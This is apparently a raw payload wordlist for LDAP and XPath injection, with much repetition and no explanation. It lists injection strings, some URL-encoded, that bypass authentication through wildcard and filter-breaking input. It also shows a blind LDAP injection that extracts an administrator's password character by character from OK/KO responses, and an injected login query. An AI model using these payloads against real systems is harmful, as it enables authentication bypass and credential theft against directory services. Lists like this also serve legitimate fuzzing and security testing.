* *)(& *))%00 *()|%26' *()|&' *(|(mail=*)) *(|(objectclass=*)) *)(uid=*))(|(uid=* */* *| / // //* @* | admin* admin*)((|userpassword=*) admin*)((|userPassword=*) x' or name()='username' or 'x'='y ! %21 %26 %28 %29 %2A%28%7C%28mail%3D%2A%29%29 %2A%28%7C%28objectclass%3D%2A%29%29 %2A%7C %7C & ( ) *(|(mail=*)) *(|(objectclass=*)) */* *| / // //* @* x' or name()='username' or 'x'='y | *()|&' admin* admin*)((|userpassword=*) *)(uid=*))(|(uid=* * *)(& *))%00 *()|%26' *()|&' *(|(mail=*)) *(|(objectclass=*)) *)(uid=*))(|(uid=* */* *| / // //* @* | admin* admin*)((|userpassword=*) admin*)((|userPassword=*) x' or name()='username' or 'x'='y (&(sn=administrator)(password=*)) : OK (&(sn=administrator)(password=A*)) : KO (&(sn=administrator)(password=B*)) : KO ... (&(sn=administrator)(password=M*)) : OK (&(sn=administrator)(password=MA*)) : KO (&(sn=administrator)(password=MB*)) : KO ... (&(sn=administrator)(password=MY*)) : OK (&(sn=administrator)(password=MYA*)) : KO (&(sn=administrator)(password=MYB*)) : KO (&(sn=administrator)(password=MYC*)) : KO ... (&(sn=administrator)(password=MYK*)) : OK (&(sn=administrator)(password=MYKE)) : OK user = *)(uid=*))(|(uid=* pass = password query = "(&(uid=*)(uid=*)) (|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))"